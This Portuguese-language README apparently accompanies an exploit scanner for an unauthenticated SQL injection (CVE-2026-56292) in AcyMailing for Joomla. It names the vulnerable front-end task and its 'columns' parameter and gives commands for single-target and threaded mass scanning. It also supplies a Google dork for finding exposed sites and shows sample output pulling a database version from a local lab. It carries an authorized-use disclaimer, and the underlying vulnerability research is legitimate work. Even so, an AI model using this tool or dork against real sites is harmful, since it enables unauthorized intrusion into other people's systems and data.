
CVE-2026-56292 - Scanner de injeção SQL não autenticada no AcyMailing for Joomla
Autor: nullwhisper
Somente para pesquisa de segurança autorizada / validação de vulnerabilidades.
O AcyMailing para Joomla expõe a tarefa pública de front-end frontentityselect::loadEntityFront. Em versões mais antigas, o parâmetro columns é passado diretamente para uma consulta SQL sem sanitização. As versões corrigidas usam acym_secureDBColumn() e retornam um erro como ... not secured.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Alvo único:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Varredura em massa:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Opções:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
Testado contra uma instalação do AcyMailing v11.0.3 em um laboratório local do Joomla 5 (modo de simulação vulnerável).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Veja dorks.txt. Dork principal:
inurl:"index.php?option=com_acym"
Esta ferramenta destina-se apenas a testes de segurança autorizados e pesquisa. Não a utilize contra sistemas que você não possua ou para os quais não tenha permissão explícita por escrito para testar. O autor (nullwhisper) não é responsável pelo uso indevido ou por danos causados por este código.
MIT — veja LICENSE.